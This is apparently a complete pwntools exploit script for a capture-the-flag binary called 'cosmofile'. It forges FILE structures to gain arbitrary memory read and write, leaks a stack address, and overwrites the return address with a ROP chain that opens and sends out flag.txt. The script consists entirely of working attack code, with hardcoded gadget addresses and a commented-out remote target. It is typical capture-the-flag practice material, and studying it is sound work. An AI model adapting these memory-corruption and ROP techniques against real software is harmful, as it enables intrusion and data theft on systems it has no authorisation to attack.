from pwn import *


#p = process('./cosmofile')
#p = remote('34.45.81.67', 16005)
p = remote('localhost', 5000)
#gdb.attach(p)


def fread():
    p.sendlineafter(b'>', b'1')

    p.recvuntil(b'Content of cosmofile:\n')
    return p.recvn(0x1000)
def exet():
    p.sendlineafter(b'>', b'2')

def write_into_FILE(payload):
    p.sendlineafter(b'>', b'7238770')
    p.sendafter(b"that's not really a secret...", payload)

def arb_read(addr):
    sz = 0x1000
    beg = 0x0
    end = 0x1000
    payload = p64(0x0000024200010100)+p64(0x0000000300000000)+p64(0x0000000000000000)+p32(sz)+p32(beg)+p32(end)+p32(0x0)+p64(addr)+p64(0x0)+p64(0x2)+p64(0x0)*3+p64(0x000000000042f338)+ p64(0x000000000042f3d8)+p64(0x0000000000000000)

    write_into_FILE(payload)
    return fread()

def arb_write(addr, data):
    sz = 0x1001
    beg = 0x0
    end = 0x0
    payload = p64(0x0000024200010100)+p64(0x0000000000000000)+p64(0x0000000000000000)+p32(sz)+p32(beg)+p32(end)+p32(0x0)+p64(addr)+p64(0x0)+p64(0x2)+p64(0x0)*3+p64(0x000000000042f338)+ p64(0x000000000042f3d8)+p64(0x0000000000000000)

    write_into_FILE(payload)

    p.sendlineafter(b'>', b'1')
    pay = b'a'*(0x1000) + data 
    pay = pay + b'c'*(0x1000+4085-len(pay))
    p.send(pay) 


argv = u64(arb_read(0x438098)[:8]) 
ret = argv - 0x1040

poprdi_rbp = p64(0x00000000004010b7)
poprsi_rbp = p64(0x0000000000401e1b)
movrdirsi = p64(0x0000000000411dfc) #0x0000000000411dfc : mov qword ptr [rdi], rsi ; ret
movrdxrdi = p64(0x00000000004231fa) #0x00000000004231fa : mov rdx, rdi ; ret
poprax = p64(0x000000000040bdf5) # 0x000000000040bdf5 : pop rax ; ret

syscall = p64(0x4111fa)
poprdirsirbp = p64(0x000000000040401d ) # 0x000000000040401d : pop rsi ; pop rdi ; pop rbp ; ret

flagstr = p64(0x42f690)

payload = poprdirsirbp + p64(0x0)+p64(0x42f698)+p64(0x0)+movrdirsi+poprdirsirbp + p64(0x7478742e67616c66)+flagstr +p64(0x0)+movrdirsi + poprsi_rbp + p64(0x0)*2+poprax + p64(0x2)+syscall+poprdirsirbp + p64(0x4)+p64(0x1)+p64(0x0)+poprax + p64(0x28)+p64(0x0000000000401a5f)+p64(0x000000000041710e)+syscall

arb_write(ret, payload)

log.info('argv: '+hex(argv))
p.interactive()
